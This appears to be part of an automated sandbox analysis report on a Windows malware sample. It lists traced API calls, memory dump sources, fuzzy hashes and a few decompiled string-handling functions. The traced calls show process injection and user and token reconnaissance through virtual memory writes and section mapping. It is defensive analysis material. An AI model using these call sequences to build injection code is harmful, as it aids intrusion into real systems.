                                                              • Part of subcall function 045845A5: StrChrA.SHLWAPI(00000000,0000003F,?,?,0457786C,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,0456908A,00000008,0457B24C), ref: 045845BD
                                                            • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0457786C,00000000,00000000,00000000,00000008,0000EA60,00000000), ref: 04575D52
                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 04575D62
                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 04575D6E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                            • String ID:
                                                            • API String ID: 3767559652-0
                                                            • Opcode ID: 891c4818af65a63f242be57bce9679bcd6b04b2e8d12455d34be51fa480a2e7d
                                                            • Instruction ID: 7b1490cb45decae1783a00dfd8de732f6fc106e1da0e6dd9af930d0e8fcb48dd
                                                            • Opcode Fuzzy Hash: 891c4818af65a63f242be57bce9679bcd6b04b2e8d12455d34be51fa480a2e7d
                                                            • Instruction Fuzzy Hash: 8721967150025AFFDB12AF64D848A9E7FA9FF56654F048064EC05AF101EB35EA05A7A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 58%
                                                            			E00DD4EEF(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                            				intOrPtr* _v8;
                                                            				void* _t17;
                                                            				intOrPtr* _t22;
                                                            				void* _t27;
                                                            				char* _t30;
                                                            				void* _t33;
                                                            				void* _t34;
                                                            				void* _t36;
                                                            				void* _t37;
                                                            				void* _t39;
                                                            				int _t42;
                                                            
                                                            				_t17 = __eax;
                                                            				_t37 = 0;
                                                            				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                            				_t2 = _t17 + 1; // 0x1
                                                            				_t28 = _t2;
                                                            				_t34 = E00DD77D7(_t2);
                                                            				if(_t34 != 0) {
                                                            					_t30 = E00DD77D7(_t28);
                                                            					if(_t30 == 0) {
                                                            						E00DD77EC(_t34);
                                                            					} else {
                                                            						_t39 = _a4;
                                                            						_t22 = E00DD783A(_t39);
                                                            						_v8 = _t22;
                                                            						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                            							_a4 = _t39;
                                                            						} else {
                                                            							_t26 = _t22 + 2;
                                                            							_a4 = _t22 + 2;
                                                            							_t22 = E00DD783A(_t26);
                                                            							_v8 = _t22;
                                                            						}
                                                            						if(_t22 == 0) {
                                                            							__imp__(_t34, _a4);
                                                            							 *_t30 = 0x2f;
                                                            							 *((char*)(_t30 + 1)) = 0;
                                                            						} else {
                                                            							_t42 = _t22 - _a4;
                                                            							memcpy(_t34, _a4, _t42);
                                                            							 *((char*)(_t34 + _t42)) = 0;
                                                            							__imp__(_t30, _v8);
                                                            						}
                                                            						 *_a8 = _t34;
                                                            						_t37 = 1;
                                                            						 *_a12 = _t30;
                                                            					}
                                                            				}
                                                            				return _t37;
                                                            			}

                                                            APIs
                                                            • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,00DD69C2,00000000,00000000,00000000,039C9698,?,?,00DD3771,?,039C9698), ref: 00DD4EFB
                                                              • Part of subcall function 00DD77D7: RtlAllocateHeap.NTDLL(00000000,00000000,00DD1275), ref: 00DD77E3
                                                              • Part of subcall function 00DD783A: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00DD4F29,00000000,00000001,00000001,?,?,00DD69C2,00000000,00000000,00000000,039C9698), ref: 00DD7848
                                                              • Part of subcall function 00DD783A: StrChrA.SHLWAPI(?,0000003F,?,?,00DD69C2,00000000,00000000,00000000,039C9698,?,?,00DD3771,?,039C9698,0000EA60,?), ref: 00DD7852
                                                            • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00DD69C2,00000000,00000000,00000000,039C9698,?,?,00DD3771), ref: 00DD4F59
                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00DD4F69
                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00DD4F75
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                            • String ID:
                                                            • API String ID: 3767559652-0
                                                            • Opcode ID: 6fbe79ca8964b823305c74d705d70b30aafbdd7918aa15cd7ffdfa5ef324960f
                                                            • Instruction ID: 07245ea172b15eb58d91df9ce3254dd0f0356ce5cc28d8eac342215f148e8265
                                                            • Opcode Fuzzy Hash: 6fbe79ca8964b823305c74d705d70b30aafbdd7918aa15cd7ffdfa5ef324960f
                                                            • Instruction Fuzzy Hash: 57219076504255BFCB025F78CC44AAE7FA8DF06390B058096F9489B321E731C901D7B1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID:
                                                            • API String ID: 2221118986-0
                                                            • Opcode ID: 8de7f7e231b166f2716af6db8127298234bc8a7c57dad98130b045f549be7daa
                                                            • Instruction ID: 25665d5cfdefc4c6e3b7ff31a6856e5e6cd051fc6171c2afe03f8ec7cf295684
                                                            • Opcode Fuzzy Hash: 8de7f7e231b166f2716af6db8127298234bc8a7c57dad98130b045f549be7daa
                                                            • Instruction Fuzzy Hash: 9311A77250050AFFDB105F60FC44A667739FF09328B040124F94596811D772B9B1EBE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00DD73AF(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                            				void* _v8;
                                                            				void* _t18;
                                                            				int _t25;
                                                            				int _t29;
                                                            				int _t34;
                                                            
                                                            				_t29 = lstrlenW(_a4);
                                                            				_t25 = lstrlenW(_a8);
                                                            				_t18 = E00DD77D7(_t25 + _t29 + _t25 + _t29 + 2);
                                                            				_v8 = _t18;
                                                            				if(_t18 != 0) {
                                                            					_t34 = _t29 + _t29;
                                                            					memcpy(_t18, _a4, _t34);
                                                            					_t10 = _t25 + 2; // 0x2
                                                            					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                            				}
                                                            				return _v8;
                                                            			}

                                                            APIs
                                                            • lstrlenW.KERNEL32(004F0053,?,73B75520,00000008,039C930C,?,00DD1543,004F0053,039C930C,?,?,?,?,?,?,00DD6DBE), ref: 00DD73BF
                                                            • lstrlenW.KERNEL32(00DD1543,?,00DD1543,004F0053,039C930C,?,?,?,?,?,?,00DD6DBE), ref: 00DD73C6
                                                              • Part of subcall function 00DD77D7: RtlAllocateHeap.NTDLL(00000000,00000000,00DD1275), ref: 00DD77E3
                                                            • memcpy.NTDLL(00000000,004F0053,73B769A0,?,?,00DD1543,004F0053,039C930C,?,?,?,?,?,?,00DD6DBE), ref: 00DD73E6
                                                            • memcpy.NTDLL(73B769A0,00DD1543,00000002,00000000,004F0053,73B769A0,?,?,00DD1543,004F0053,039C930C), ref: 00DD73F9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: lstrlenmemcpy$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 2411391700-0
                                                            • Opcode ID: 6f4a0af0d044df2806cc67381d63462fe1005a181afc0c58d7e55661128f0e0d
                                                            • Instruction ID: abdf4110302ffbaee877d1315ea5d231561245e9d412a5e739dab57fb5f1ab2f
                                                            • Opcode Fuzzy Hash: 6f4a0af0d044df2806cc67381d63462fe1005a181afc0c58d7e55661128f0e0d
                                                            • Instruction Fuzzy Hash: D5F0E776901118BB8F11EBA9CC85C9E7BACEF093547154063FA08D7212E635EA159BB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(69B25F44,00000000,?,00000000,04571E61,00000000,?,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 045688E9
                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,045738EE), ref: 045688EE
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • memcpy.NTDLL(00000000,?,00000000,?,?,?,?,?,?,?,045738EE), ref: 0456890A
                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 04568928
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$AllocateHeaplstrcpymemcpy
                                                            • String ID:
                                                            • API String ID: 1697500751-0
                                                            • Opcode ID: 7d676b23a97bcf1541932eaa80d8e1da77b9684c2ec47941877d95c779e4b5d3
                                                            • Instruction ID: c2326c70386fa81aec8b948d0918eb69debc605cf71fbd053caf8be86f61b1f2
                                                            • Opcode Fuzzy Hash: 7d676b23a97bcf1541932eaa80d8e1da77b9684c2ec47941877d95c779e4b5d3
                                                            • Instruction Fuzzy Hash: B9F0F67B405741ABD3316E69AC48E5B7B9CFFC5311F040015E94693210DB35E818EBB2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(049B9986,00000000,73BB81D0,00000000,045763E9,00000000), ref: 045695ED
                                                            • lstrlen.KERNEL32(?), ref: 045695F5
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • lstrcpy.KERNEL32(00000000,049B9986), ref: 04569609
                                                            • lstrcat.KERNEL32(00000000,?), ref: 04569614
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                            • String ID:
                                                            • API String ID: 74227042-0
                                                            • Opcode ID: 8326c6ed7f02b05f08e457afa8e61c46921ad44cc47644bb3629fb9b183a81e6
                                                            • Instruction ID: a5144b08e7b2b04795714005257dafc028eb3d01fc2f07e801a35a04b3b3fab6
                                                            • Opcode Fuzzy Hash: 8326c6ed7f02b05f08e457afa8e61c46921ad44cc47644bb3629fb9b183a81e6
                                                            • Instruction Fuzzy Hash: 99E0ED73501225E787115BE9AC48C5FBBACFF99651704041AF601A3101CB299C19ABA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(039C887A,00000000,00000000,00000000,00DD730A,00000000), ref: 00DD7077
                                                            • lstrlen.KERNEL32(?), ref: 00DD707F
                                                              • Part of subcall function 00DD77D7: RtlAllocateHeap.NTDLL(00000000,00000000,00DD1275), ref: 00DD77E3
                                                            • lstrcpy.KERNEL32(00000000,039C887A), ref: 00DD7093
                                                            • lstrcat.KERNEL32(00000000,?), ref: 00DD709E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                            • String ID:
                                                            • API String ID: 74227042-0
                                                            • Opcode ID: 661e91b35804a2af267b41c2be250c48a676295a47b4deacd96eefcb84d573f5
                                                            • Instruction ID: d7c9adee2cb309094a8a3a7093511b653332fe5e987e5a26fed0adcaf4221ae6
                                                            • Opcode Fuzzy Hash: 661e91b35804a2af267b41c2be250c48a676295a47b4deacd96eefcb84d573f5
                                                            • Instruction Fuzzy Hash: 89E01273906325AB87115BE8AC48CAFFBADEF897517084457F600D3310D7259805CBF1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Executed Functions

                                                            APIs
                                                            • RtlInitializeCriticalSection.NTDLL(04BCC328), ref: 04BA7FFB
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • memset.NTDLL ref: 04BA802C
                                                            • RtlInitializeCriticalSection.NTDLL(05C8B148), ref: 04BA803D
                                                              • Part of subcall function 04BAD464: RtlInitializeCriticalSection.NTDLL(04BCC300), ref: 04BAD488
                                                              • Part of subcall function 04BAD464: RtlInitializeCriticalSection.NTDLL(04BCC2E0), ref: 04BAD49E
                                                              • Part of subcall function 04BAD464: GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04BB3914), ref: 04BAD4AF
                                                              • Part of subcall function 04BAD464: GetModuleHandleA.KERNEL32(0000170B), ref: 04BAD4E3
                                                              • Part of subcall function 04BC3D51: RtlAllocateHeap.NTDLL(00000000,-00000003,77109EB0), ref: 04BC3D6B
                                                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000060), ref: 04BA8066
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04BB3914), ref: 04BA8077
                                                            • CloseHandle.KERNEL32(00000428), ref: 04BA808B
                                                            • GetUserNameA.ADVAPI32(00000000,?), ref: 04BA80D4
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BA80E7
                                                            • GetUserNameA.ADVAPI32(00000000,?), ref: 04BA80FC
                                                            • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 04BA812C
                                                            • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 04BA8141
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04BB3914), ref: 04BA814B
                                                            • CloseHandle.KERNEL32(00000000), ref: 04BA8158
                                                            • GetShellWindow.USER32 ref: 04BA8173
                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 04BA817A
                                                            • memcpy.NTDLL(04BCC1E4,?,00000018), ref: 04BA81B6
                                                            • CreateEventA.KERNEL32(04BCC1A8,00000001,00000000,00000000,?,00000001), ref: 04BA8239
                                                            • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 04BA8263
                                                            • OpenEventA.KERNEL32(00100000,00000000,05C8A9E0), ref: 04BA828B
                                                            • CreateEventA.KERNEL32(04BCC1A8,00000001,00000000,05C8A9E0), ref: 04BA829E
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04BB3914), ref: 04BA82A4
                                                            • GetLastError.KERNEL32(04BB4A5B,04BCC0FC,04BCC100), ref: 04BA832A
                                                            • LoadLibraryA.KERNEL32(?,04BB4A5B,04BCC0FC,04BCC100), ref: 04BA8345
                                                            • SetEvent.KERNEL32(?,04BAD17E,00000000,00000000), ref: 04BA83DA
                                                            • RtlAllocateHeap.NTDLL(00000000,00000052,04BAD17E), ref: 04BA83EF
                                                            • wsprintfA.USER32 ref: 04BA841F
                                                              • Part of subcall function 04BBDB4F: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00000000,04BA83BB,04BAD17E,00000000,00000000), ref: 04BBDBC5
                                                              • Part of subcall function 04BC398C: HeapFree.KERNEL32(00000000,00000000,00000000,1D4E36C0,?,00000000,?,?,?,00000000,04BA83C0,04BAD17E,00000000,00000000), ref: 04BC39FD
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Allocate$CriticalErrorEventInitializeLastSection$CreateHandleProcess$CloseFreeNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemcpymemsetwsprintf
                                                            • String ID:
                                                            • API String ID: 2659885799-0
                                                            • Opcode ID: 389bb61aefb3dd46b02d6a6c9a38a1a0667812d30f7b65a5812a359df4e4a0c2
                                                            • Instruction ID: 9dcdcefc0db46f9f14634b0b7d96ff35a8453d96b00c3f7bc2f7e0137dce8fe1
                                                            • Opcode Fuzzy Hash: 389bb61aefb3dd46b02d6a6c9a38a1a0667812d30f7b65a5812a359df4e4a0c2
                                                            • Instruction Fuzzy Hash: 66C19E709083099FD720AF69E8C492A7BF8FB58705B40489FF54AD7640DB78BC658B71
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,04BCC1AC,00000000), ref: 04BB3827
                                                            • StrRChrA.SHLWAPI(05C8A5B0,00000000,0000005C,00000000,00000001,00000000,04BCC16C,00000000,?), ref: 04BB383C
                                                            • _strupr.NTDLL ref: 04BB3852
                                                            • lstrlen.KERNEL32(05C8A5B0), ref: 04BB385A
                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000001,00000000,04BCC16C,00000000,?), ref: 04BB38DA
                                                            • RtlAddVectoredExceptionHandler.NTDLL(00000000,04BB0001), ref: 04BB3901
                                                            • GetLastError.KERNEL32(?), ref: 04BB391B
                                                            • RtlRemoveVectoredExceptionHandler.NTDLL(050305B8), ref: 04BB3931
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: DescriptorExceptionHandlerSecurityVectored$ConvertCreateErrorEventLastRemoveString_struprlstrlen
                                                            • String ID:
                                                            • API String ID: 1098824789-0
                                                            • Opcode ID: 78c4eeb2a6976583b166e8a2ed1a166cf101953d5ac6a693a85bb522354ff5e0
                                                            • Instruction ID: 22bbcba414bb1fa1f73b5ef61bc09339518cb77974f5a36aeb2f92d7242b87ca
                                                            • Opcode Fuzzy Hash: 78c4eeb2a6976583b166e8a2ed1a166cf101953d5ac6a693a85bb522354ff5e0
                                                            • Instruction Fuzzy Hash: 1E31B171A001159FEB10AF75DCC4ABE7BF8EB1C704B0105AAEAD6E3141D6B9AC548BE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • NtOpenProcess.NTDLL(00000000,00000400,?,00000000), ref: 04BADEBE
                                                            • NtOpenProcessToken.NTDLL(00000000,00000008,00000001), ref: 04BADED1
                                                            • NtQueryInformationToken.NTDLL(00000001,00000001,00000000,00000000,00000000), ref: 04BADEED
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • NtQueryInformationToken.NTDLL(00000001,00000001,00000000,00000000,00000000), ref: 04BADF0A
                                                            • memcpy.NTDLL(00000000,00000000,0000001C), ref: 04BADF17
                                                            • NtClose.NTDLL(00000001), ref: 04BADF29
                                                            • NtClose.NTDLL(00000000), ref: 04BADF33
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                            • String ID:
                                                            • API String ID: 2575439697-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 04BA1330
                                                            • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 04BA133D
                                                            • NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 04BA13C9
                                                            • GetModuleHandleA.KERNEL32(00000000), ref: 04BA13D4
                                                            • RtlImageNtHeader.NTDLL(00000000), ref: 04BA13DD
                                                            • RtlExitUserThread.NTDLL(00000000), ref: 04BA13F2
                                                              • Part of subcall function 04BA2730: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04BA136B,?), ref: 04BA2738
                                                              • Part of subcall function 04BA2730: GetVersion.KERNEL32 ref: 04BA2747
                                                              • Part of subcall function 04BA2730: GetCurrentProcessId.KERNEL32 ref: 04BA2756
                                                              • Part of subcall function 04BA2730: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04BA2773
                                                              • Part of subcall function 04BB5020: memcpy.NTDLL(00000000,00000000,?,?,00000000,00000001,?,?,00000000,?,?,?,?,04BA1379,?), ref: 04BB507F
                                                              • Part of subcall function 04BBB54C: GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,00000000,00000000,?,?,04BA138B,00000000,04BCC16C,00000000), ref: 04BBB572
                                                              • Part of subcall function 04BB527F: OpenProcess.KERNEL32(00000400,00000000,?,00000000,00000000,?,?,04BA13A2,00000000,04BCC16C,00000000,?), ref: 04BB529A
                                                              • Part of subcall function 04BB527F: IsWow64Process.KERNEL32(00000000,?,00000000,00000000,?,?,04BA13A2,00000000,04BCC16C,00000000,?), ref: 04BB52AB
                                                              • Part of subcall function 04BB527F: CloseHandle.KERNEL32(00000000,?,?,04BA13A2,00000000,04BCC16C,00000000,?), ref: 04BB52BE
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Process$CreateFileHandleModuleOpenThreadTime$CloseCurrentEventExitHeaderHeapImageInformationNameQuerySystemUserVersionWow64memcpy
                                                            • String ID:
                                                            • API String ID: 3825956196-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memcpy.NTDLL(?,04BC2C28,00000800,?,?,00000000,00000000), ref: 04BB98DD
                                                              • Part of subcall function 04BAF7AF: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,04BB97AB,?,?,?,00000000,00000000), ref: 04BAF7D4
                                                              • Part of subcall function 04BAF7AF: GetProcAddress.KERNEL32(00000000,?), ref: 04BAF7F6
                                                              • Part of subcall function 04BAF7AF: GetProcAddress.KERNEL32(00000000,?), ref: 04BAF80C
                                                              • Part of subcall function 04BAF7AF: GetProcAddress.KERNEL32(00000000,?), ref: 04BAF822
                                                              • Part of subcall function 04BAF7AF: GetProcAddress.KERNEL32(00000000,?), ref: 04BAF838
                                                              • Part of subcall function 04BAF7AF: GetProcAddress.KERNEL32(00000000,?), ref: 04BAF84E
                                                              • Part of subcall function 04BB680B: NtMapViewOfSection.NTDLL(00000000,000000FF,04BBA293,00000000,00000000,04BBA293,00000000,00000002,00000000,?,?,00000000,04BBA293,000000FF,00000000), ref: 04BB6839
                                                              • Part of subcall function 04BA85E6: memcpy.NTDLL(?,?,?,?,?,?,04BADC59,04BADC59,?,?,?,00000000,00000000), ref: 04BA864C
                                                              • Part of subcall function 04BA85E6: memcpy.NTDLL(00000000,?,?), ref: 04BA86AB
                                                            • memcpy.NTDLL(?,?,?,?,?,04BADC59,04BADC59,04BADC59,?,?,?,00000000,00000000), ref: 04BB980A
                                                            • memcpy.NTDLL(?,?,00000018,?,?,04BADC59,04BADC59,04BADC59,?,?,?,00000000,00000000), ref: 04BB9856
                                                            • NtUnmapViewOfSection.NTDLL(000000FF,00000000,00000000,00000000), ref: 04BB991B
                                                            • memset.NTDLL ref: 04BB995D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressProcmemcpy$SectionView$HandleModuleUnmapmemset
                                                            • String ID:
                                                            • API String ID: 1575695328-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetProcAddress.KERNEL32(?,00000318), ref: 04BA9318
                                                            • NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 04BA9334
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                              • Part of subcall function 04BA6EB0: GetProcAddress.KERNEL32(?,00000000), ref: 04BA6ED9
                                                              • Part of subcall function 04BA6EB0: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,04BA9375,00000000,00000000,00000028,00000100), ref: 04BA6EFB
                                                            • StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 04BA949E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
                                                            • String ID:
                                                            • API String ID: 3547194813-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.NTDLL ref: 04BB5B01
                                                            • GetProcAddress.KERNEL32(?), ref: 04BB5B29
                                                            • NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,00000000,?,00001000,00000000), ref: 04BB5B47
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressInformationProcProcess64QueryWow64memset
                                                            • String ID:
                                                            • API String ID: 2968673968-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • NtAllocateVirtualMemory.NTDLL(04BA489B,00000000,00000000,04BA489B,00003000,00000040), ref: 04BA41A4
                                                            • RtlNtStatusToDosError.NTDLL(00000000), ref: 04BA41AB
                                                            • SetLastError.KERNEL32(00000000), ref: 04BA41B2
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Error$AllocateLastMemoryStatusVirtual
                                                            • String ID:
                                                            • API String ID: 722216270-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • NtWriteVirtualMemory.NTDLL(00000318,00000000,00000000,?,04BA493D,00000000,?,04BA493D,?,00000000,00000000,00000318,00000020,?,00010003,?), ref: 04BBA449
                                                            • RtlNtStatusToDosError.NTDLL(C0000002), ref: 04BBA458
                                                            • SetLastError.KERNEL32(00000000,?,04BA493D,?,00000000,00000000,00000318,00000020,?,00010003,?,?,00000318,00000008), ref: 04BBA45F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Error$LastMemoryStatusVirtualWrite
                                                            • String ID:
                                                            • API String ID: 1089604434-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000), ref: 04BBA27C
                                                              • Part of subcall function 04BB680B: NtMapViewOfSection.NTDLL(00000000,000000FF,04BBA293,00000000,00000000,04BBA293,00000000,00000002,00000000,?,?,00000000,04BBA293,000000FF,00000000), ref: 04BB6839
                                                            • memset.NTDLL ref: 04BBA2A0
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Section$CreateViewmemset
                                                            • String ID:
                                                            • API String ID: 2533685722-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 04BA6ED9
                                                            • NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,04BA9375,00000000,00000000,00000028,00000100), ref: 04BA6EFB
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressMemory64ProcReadVirtualWow64
                                                            • String ID:
                                                            • API String ID: 752694512-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • NtMapViewOfSection.NTDLL(00000000,000000FF,04BBA293,00000000,00000000,04BBA293,00000000,00000002,00000000,?,?,00000000,04BBA293,000000FF,00000000), ref: 04BB6839
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: SectionView
                                                            • String ID:
                                                            • API String ID: 1323581903-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • NtQueryInformationProcess.NTDLL(00000000,00000402,00000018,00000000,04BCC300), ref: 04BB0FBC
